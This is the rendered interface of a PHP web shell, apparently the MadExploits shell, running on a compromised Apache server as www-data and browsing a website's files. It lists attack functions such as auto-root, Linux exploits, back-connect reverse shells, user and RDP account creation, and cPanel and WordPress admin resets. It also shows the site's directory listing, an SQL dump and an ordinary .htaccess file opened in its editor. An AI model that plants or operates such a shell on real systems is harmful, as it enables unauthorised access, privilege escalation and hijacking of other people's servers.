Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.154.250
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
fastspeedlinks.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cableinternet
[ DIR ]
drwxr-xr-x
source
[ DIR ]
drwxr-xr-x
.gitignore
623
B
-rw-r--r--
.htaccess
2.17
KB
-rw-r--r--
adminer.php
465.43
KB
-rwxrwxr-x
arpuae.sql
46.48
KB
-rw-r--r--
favicon.ico
0
B
-rw-r--r--
faviicon.png
1.7
KB
-rw-r--r--
index.php
2.29
KB
-rw-r--r--
package-lock.json
87
B
-rw-r--r--
robots.txt
28
B
-rw-r--r--
sitemap.xml
0
B
-rw-r--r--
web.config
1.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<IfModule mod_rewrite.c> <IfModule mod_negotiation.c> Options -MultiViews -Indexes </IfModule> RewriteEngine On # Handle Authorization Header RewriteCond %{HTTP:Authorization} . RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] # Redirect Trailing Slashes If Not A Folder... RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} (.+)/$ RewriteRule ^ %1 [L,R=301] # Send Requests To Front Controller... RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^ index.php [L] </IfModule> <IfModule mod_expires.c> ExpiresActive On # Images ExpiresByType image/jpg "access plus 1 year" ExpiresByType image/jpeg "access plus 1 year" ExpiresByType image/png "access plus 1 year" ExpiresByType image/gif "access plus 1 year" ExpiresByType image/webp "access plus 1 year" # CSS, JavaScript ExpiresByType text/css "access plus 1 month" ExpiresByType application/javascript "access plus 1 month" # Fonts ExpiresByType font/woff2 "access plus 1 year" ExpiresByType font/woff "access plus 1 year" # Default ExpiresDefault "access plus 1 month" </IfModule> # Add this inside your .htaccess file in public_html or project root <IfModule mod_expires.c> ExpiresActive On # Images ExpiresByType image/jpg "access plus 1 year" ExpiresByType image/jpeg "access plus 1 year" ExpiresByType image/png "access plus 1 year" ExpiresByType image/gif "access plus 1 year" ExpiresByType image/webp "access plus 1 year" ExpiresByType image/svg+xml "access plus 1 year" ExpiresByType image/x-icon "access plus 1 year" # CSS, JS ExpiresByType text/css "access plus 1 month" ExpiresByType text/javascript "access plus 1 month" ExpiresByType application/javascript "access plus 1 month" # Fonts ExpiresByType font/woff2 "access plus 1 year" ExpiresByType font/woff "access plus 1 year" ExpiresByType font/ttf "access plus 1 year" </IfModule> <IfModule mod_headers.c> <filesmatch "\.(ico|jpg|jpeg|png|gif|webp|svg|css|js|woff2|woff|ttf)$"> Header set Cache-Control "max-age=31536000, public" </filesmatch> </IfModule>
Close